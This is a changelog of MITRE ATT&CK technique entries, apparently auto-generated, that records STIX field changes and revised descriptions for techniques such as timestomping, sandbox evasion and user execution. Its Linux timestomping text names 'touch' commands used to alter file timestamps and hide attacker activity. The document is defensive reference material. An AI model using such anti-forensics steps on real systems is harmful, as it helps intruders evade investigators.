| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 12:24:54.198000+00:00 | 2025-04-15 19:59:16.376000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1497.003] Virtualization/Sandbox Evasion: Time Based Evasion
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis', 'Signature-based detection', 'Static File Analysis', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:50:18.048000+00:00 | 2025-04-15 19:58:29.032000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1547.003] Boot or Logon Autostart Execution: Time Providers
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-12 02:34:58.003000+00:00 | 2025-04-15 19:58:35.700000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1070.006] Indicator Removal: Timestomp
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may modify file time attributes to hide new file | t | Adversaries may modify file time attributes to hide new file |
| s or changes to existing files. Timestomping is a technique | | s or changes to existing files. Timestomping is a technique |
| that modifies the timestamps of a file (the modify, access, | | that modifies the timestamps of a file (the modify, access, |
| create, and change times), often to mimic files that are in | | create, and change times), often to mimic files that are in |
| the same folder and blend malicious files with legitimate fi | | the same folder and blend malicious files with legitimate fi |
| les. Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NA | | les. In Windows systems, both the `$STANDARD_INFORMATION` ( |
| ME` (`$FN`) attributes record times in a Master File Table ( | | `$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a |
| MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (da | | Master File Table (MFT) file.(Citation: Inversecos Timestom |
| tes/time stamps) is displayed to the end user, including in | | ping 2022) `$SI` (dates/time stamps) is displayed to the end |
| the File System view, while `$FN` is dealt with by the kerne | | user, including in the File System view, while `$FN` is dea |
| l.(Citation: Magnet Forensics) Modifying the `$SI` attribut | | lt with by the kernel.(Citation: Magnet Forensics) Modifyin |
| e is the most common method of timestomping because it can b | | g the `$SI` attribute is the most common method of timestomp |
| e modified at the user level using API calls. `$FN` timestom | | ing because it can be modified at the user level using API c |
| ping, however, typically requires interacting with the syste | | alls. `$FN` timestomping, however, typically requires intera |
| m kernel or moving or renaming a file.(Citation: Inversecos | | cting with the system kernel or moving or renaming a file.(C |
| Timestomping 2022) Adversaries modify timestamps on files s | | itation: Inversecos Timestomping 2022) Adversaries modify t |
| o that they do not appear conspicuous to forensic investigat | | imestamps on files so that they do not appear conspicuous to |
| ors or file analysis tools. In order to evade detections tha | | forensic investigators or file analysis tools. In order to |
| t rely on identifying discrepancies between the `$SI` and `$ | | evade detections that rely on identifying discrepancies betw |
| FN` attributes, adversaries may also engage in “double times | | een the `$SI` and `$FN` attributes, adversaries may also eng |
| tomping” by modifying times on both attributes simultaneousl | | age in “double timestomping” by modifying times on both attr |
| y.(Citation: Double Timestomping) Timestomping may be used | | ibutes simultaneously.(Citation: Double Timestomping) In Li |
| along with file name [Masquerading](https://attack.mitre.org | | nux systems and on ESXi servers, threat actors may attempt t |
| /techniques/T1036) to hide malware and tools.(Citation: Wind | | o perform timestomping using commands such as `touch -a -m - |
| owsIR Anti-Forensic Techniques) | | t <timestamp> <filename>` (which sets access and modificatio |
| | | n times to a specific value) or `touch -r <filename> <filena |
| | | me>` (which sets access and modification times to match thos |
| | | e of another file).(Citation: Inversecos Linux Timestomping) |
| | | (Citation: Juniper Networks ESXi Backdoor 2022) Timestompin |
| | | g may be used along with file name [Masquerading](https://at |
| | | tack.mitre.org/techniques/T1036) to hide malware and tools.( |
| | | Citation: WindowsIR Anti-Forensic Techniques) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 15:14:56.021000+00:00 | 2025-04-15 19:58:27.752000+00:00 |
| description | Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) | Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t ` (which sets access and modification times to a specific value) or `touch -r ` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Juniper Networks ESXi Backdoor 2022', 'description': 'Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.', 'url': 'https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers'} |
| external_references | | {'source_name': 'Inversecos Linux Timestomping', 'description': 'inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.', 'url': 'https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html'} |
| x_mitre_platforms | | ESXi |
[T1134.001] Access Token Manipulation: Token Impersonation/Theft
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control', 'System access controls', 'File system access controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-10 17:57:36.177000+00:00 | 2025-04-15 19:58:48.792000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1020.001] Automated Exfiltration: Traffic Duplication
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:08:13.273000+00:00 | 2025-04-15 19:58:44.474000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1205] Traffic Signaling
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Defensive network service scanning'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 23:08:40.603000+00:00 | 2025-04-15 19:58:27.071000+00:00 |
| external_references[3]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.4 | 2.5 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1505.002] Server Software Component: Transport Agent
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator', 'root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 17:05:44.321000+00:00 | 2025-04-15 19:58:21.139000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1546.005] Event Triggered Execution: Trap
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-24 16:43:02.273000+00:00 | 2025-04-15 19:58:36.056000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1484.002] Domain or Tenant Policy Modification: Trust Modification
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 13:50:11.593000+00:00 | 2025-04-15 19:58:14.422000+00:00 |
| external_references[8]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
| x_mitre_version | 2.1 | 2.2 |
[T1127] Trusted Developer Utilities Proxy Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may take advantage of trusted developer utilitie | t | Adversaries may take advantage of trusted developer utilitie |
| s to proxy execution of malicious payloads. There are many u | | s to proxy execution of malicious payloads. There are many u |
| tilities used for software development related tasks that ca | | tilities used for software development related tasks that ca |
| n be used to execute code in various forms to assist in deve | | n be used to execute code in various forms to assist in deve |
| lopment, debugging, and reverse engineering.(Citation: engim | | lopment, debugging, and reverse engineering.(Citation: engim |
| a0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: | | a0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: |
| Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utili | | Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utili |
| ties may often be signed with legitimate certificates that a | | ties may often be signed with legitimate certificates that a |
| llow them to execute on a system and proxy execution of mali | | llow them to execute on a system and proxy execution of mali |
| cious code through a trusted process that effectively bypass | | cious code through a trusted process that effectively bypass |
| es application control solutions. | | es application control solutions. Smart App Control is a fe |
| | | ature of Windows that blocks applications it considers poten |
| | | tially malicious from running by verifying unsigned applicat |
| | | ions against a known safe list from a Microsoft cloud servic |
| | | e before executing them.(Citation: Microsoft Smart App Contr |
| | | ol) However, adversaries may leverage "reputation hijacking" |
| | | to abuse an operating system’s trust of safe, signed applic |
| | | ations that support the execution of arbitrary code. By leve |
| | | raging [Trusted Developer Utilities Proxy Execution](https:/ |
| | | /attack.mitre.org/techniques/T1127) to run their malicious c |
| | | ode, adversaries may bypass Smart App Control protections.(C |
| | | itation: Elastic Security Labs) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-05 05:00:37.443000+00:00 | 2025-04-15 19:59:24.863000+00:00 |
| description | Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions. | Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.
Smart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage "reputation hijacking" to abuse an operating system’s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs) |
| external_references[1]['description'] | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017. | Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved November 17, 2024. |
| external_references[1]['url'] | http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | https://web.archive.org/web/20160816135945/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Elastic Security Labs', 'description': 'Joe Desimone. (2024, August 5). Dismantling Smart App Control. Retrieved March 21, 2025.', 'url': 'https://www.elastic.co/security-labs/dismantling-smart-app-control'} |
| external_references | | {'source_name': 'Microsoft Smart App Control', 'description': 'Microsoft. (n.d.). Smart App Control Frequently Asked Questions. Retrieved April 4, 2025.', 'url': 'https://support.microsoft.com/en-us/windows/smart-app-control-frequently-asked-questions-285ea03d-fa88-4d56-882e-6698afdb7003'} |
[T1059.004] Command and Scripting Interpreter: Unix Shell
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may abuse Unix shell commands and scripts for ex | t | Adversaries may abuse Unix shell commands and scripts for ex |
| ecution. Unix shells are the primary command prompt on Linux | | ecution. Unix shells are the primary command prompt on Linux |
| and macOS systems, though many variations of the Unix shell | | , macOS, and ESXi systems, though many variations of the Uni |
| exist (e.g. sh, bash, zsh, etc.) depending on the specific | | x shell exist (e.g. sh, ash, bash, zsh, etc.) depending on t |
| OS or distribution.(Citation: DieNet Bash)(Citation: Apple Z | | he specific OS or distribution.(Citation: DieNet Bash)(Citat |
| Shell) Unix shells can control every aspect of a system, wit | | ion: Apple ZShell) Unix shells can control every aspect of a |
| h certain commands requiring elevated privileges. Unix shel | | system, with certain commands requiring elevated privileges |
| ls also support scripts that enable sequential execution of | | . Unix shells also support scripts that enable sequential e |
| commands as well as other typical programming operations suc | | xecution of commands as well as other typical programming op |
| h as conditionals and loops. Common uses of shell scripts in | | erations such as conditionals and loops. Common uses of shel |
| clude long or repetitive tasks, or the need to run the same | | l scripts include long or repetitive tasks, or the need to r |
| set of commands on multiple systems. Adversaries may abuse | | un the same set of commands on multiple systems. Adversarie |
| Unix shells to execute various commands or payloads. Interac | | s may abuse Unix shells to execute various commands or paylo |
| tive shells may be accessed through command and control chan | | ads. Interactive shells may be accessed through command and |
| nels or during lateral movement such as with [SSH](https://a | | control channels or during lateral movement such as with [SS |
| ttack.mitre.org/techniques/T1021/004). Adversaries may also | | H](https://attack.mitre.org/techniques/T1021/004). Adversari |
| leverage shell scripts to deliver and execute multiple comma | | es may also leverage shell scripts to deliver and execute mu |
| nds on victims or as part of payloads used for persistence. | | ltiple commands on victims or as part of payloads used for p |
| | | ersistence. Some systems, such as embedded devices, lightwe |
| | | ight Linux distributions, and ESXi servers, may leverage str |
| | | ipped-down Unix shells via Busybox, a small executable that |
| | | contains a variety of tools, including a simple shell. |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:17:19.136000+00:00 | 2025-04-15 19:58:56.647000+00:00 |
| description | Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. | Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Some systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell. |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1546.004] Event Triggered Execution: Unix Shell Configuration Modification
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 15:02:24.143000+00:00 | 2025-04-15 19:59:00.346000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
[T1552] Unsecured Credentials
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:26.362000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[6] | Network | Network Devices |
[T1550] Use Alternate Authentication Material
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:09:19.001000+00:00 | 2025-04-15 19:58:30.693000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Linux |
[T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Static File Analysis', 'Signature-based detection', 'Host forensic analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:50:18.050000+00:00 | 2025-04-15 19:58:51.123000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1204] User Execution
Current version: 1.8
Version changed from: 1.7 → 1.8
|
|
|---|
| t | An adversary may rely upon specific actions by a user in ord | t | An adversary may rely upon specific actions by a user in ord |
| er to gain execution. Users may be subjected to social engin | | er to gain execution. Users may be subjected to social engin |
| eering to get them to execute malicious code by, for example | | eering to get them to execute malicious code by, for example |
| , opening a malicious document file or link. These user acti | | , opening a malicious document file or link. These user acti |
| ons will typically be observed as follow-on behavior from fo | | ons will typically be observed as follow-on behavior from fo |
| rms of [Phishing](https://attack.mitre.org/techniques/T1566) | | rms of [Phishing](https://attack.mitre.org/techniques/T1566) |
| . While [User Execution](https://attack.mitre.org/technique | | . While [User Execution](https://attack.mitre.org/technique |
| s/T1204) frequently occurs shortly after Initial Access it m | | s/T1204) frequently occurs shortly after Initial Access it m |
| ay occur at other phases of an intrusion, such as when an ad | | ay occur at other phases of an intrusion, such as when an ad |
| versary places a file in a shared directory or on a user's d | | versary places a file in a shared directory or on a user's d |
| esktop hoping that a user will click on it. This activity ma | | esktop hoping that a user will click on it. This activity ma |
| y also be seen shortly after [Internal Spearphishing](https: | | y also be seen shortly after [Internal Spearphishing](https: |
| //attack.mitre.org/techniques/T1534). Adversaries may also | | //attack.mitre.org/techniques/T1534). Adversaries may also |
| deceive users into performing actions such as: * Enabling [ | | deceive users into performing actions such as: * Enabling [ |
| Remote Access Software](https://attack.mitre.org/techniques/ | | Remote Access Tools](https://attack.mitre.org/techniques/T12 |
| T1219), allowing direct control of the system to the adversa | | 19), allowing direct control of the system to the adversary |
| ry * Running malicious JavaScript in their browser, allowing | | * Running malicious JavaScript in their browser, allowing ad |
| adversaries to [Steal Web Session Cookie](https://attack.mi | | versaries to [Steal Web Session Cookie](https://attack.mitre |
| tre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023) | | .org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Ci |
| (Citation: Krebs Discord Bookmarks 2023) * Downloading and e | | tation: Krebs Discord Bookmarks 2023) * Downloading and exec |
| xecuting malware for [User Execution](https://attack.mitre.o | | uting malware for [User Execution](https://attack.mitre.org/ |
| rg/techniques/T1204) * Coerceing users to copy, paste, and e | | techniques/T1204) * Coerceing users to copy, paste, and exec |
| xecute malicious code manually(Citation: Reliaquest-executio | | ute malicious code manually(Citation: Reliaquest-execution)( |
| n)(Citation: proofpoint-selfpwn) For example, tech support | | Citation: proofpoint-selfpwn) For example, tech support sca |
| scams can be facilitated through [Phishing](https://attack.m | | ms can be facilitated through [Phishing](https://attack.mitr |
| itre.org/techniques/T1566), vishing, or various forms of use | | e.org/techniques/T1566), vishing, or various forms of user i |
| r interaction. Adversaries can use a combination of these me | | nteraction. Adversaries can use a combination of these metho |
| thods, such as spoofing and promoting toll-free numbers or c | | ds, such as spoofing and promoting toll-free numbers or call |
| all centers that are used to direct victims to malicious web | | centers that are used to direct victims to malicious websit |
| sites, to deliver and execute payloads containing malware or | | es, to deliver and execute payloads containing malware or [R |
| [Remote Access Software](https://attack.mitre.org/technique | | emote Access Tools](https://attack.mitre.org/techniques/T121 |
| s/T1219).(Citation: Telephone Attack Delivery) | | 9).(Citation: Telephone Attack Delivery) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-11-11 18:52:12.103000+00:00 | 2025-04-15 19:58:49.690000+00:00 |
| description | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) | An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as:
* Enabling [Remote Access Tools](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Tools](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery) |
| x_mitre_version | 1.7 | 1.8 |
[T1564.007] Hide Artifacts: VBA Stomping
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
| x_mitre_system_requirements | ['MS Office version specified in _VBA_PROJECT stream must match host'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 14:02:07.944000+00:00 | 2025-04-15 19:59:06.926000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1055.014] Process Injection: VDSO Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-07 17:09:09.048000+00:00 | 2025-04-15 19:58:52.691000+00:00 |
| external_references[1]['description'] | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020. | backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ | https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1021.005] Remote Services: VNC
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['VNC server installed and listening for connections.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:20:07.264000+00:00 | 2025-04-15 19:58:01.548000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1078] Valid Accounts
Current version: 2.8
Version changed from: 2.7 → 2.8
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Firewall', 'Anti-virus', 'Host Intrusion Prevention Systems', 'Network Intrusion Detection System', 'Application Control', 'System Access Controls'] | |
| x_mitre_effective_permissions | ['User', 'Administrator'] | |
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:09:46.024000+00:00 | 2025-04-15 19:58:58.373000+00:00 |
| x_mitre_version | 2.7 | 2.8 |
| x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
